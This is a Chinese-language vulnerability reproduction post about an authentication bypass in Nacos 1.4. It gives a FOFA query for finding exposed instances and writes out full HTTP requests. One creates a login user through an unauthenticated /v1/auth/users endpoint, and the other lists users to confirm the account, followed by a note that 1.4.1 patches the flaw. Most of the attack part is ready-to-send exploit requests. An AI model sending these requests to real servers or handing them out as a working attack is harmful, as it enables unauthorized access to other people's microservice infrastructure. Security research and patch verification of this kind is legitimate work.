Nacos 认证绕过
Nacos 介绍
Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。 Nacos 是构建以“服务”为中心的现代应用架构 (例如微服务范式、云原生范式) 的服务基础设施。
漏洞成因:
1、未授权访问接口,可以创建登录用户
2、严格意义上来说,还有一个接口,属于敏感信息泄露漏洞
漏洞影响:
1.4版本
漏洞复现:
FOFA语法:title="nacos"
通过未授权接口创建用户
POST /v1/auth/users?username=test&password=test123 HTTP/1.1
Host: 47.108.000.000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: https://47.108.000.000
Connection: close
Referer: https://47.108.000.000/
通过信息泄漏的接口查询用户是否创建成功
GET /v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
Host: 47.108.000.000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: https://47.108.000.000
Connection: close
Referer: https://47.108.000.000/
漏洞验证
使用创建的系统登录系统
漏洞补丁:
1.4.1 官网已经修复了该漏洞。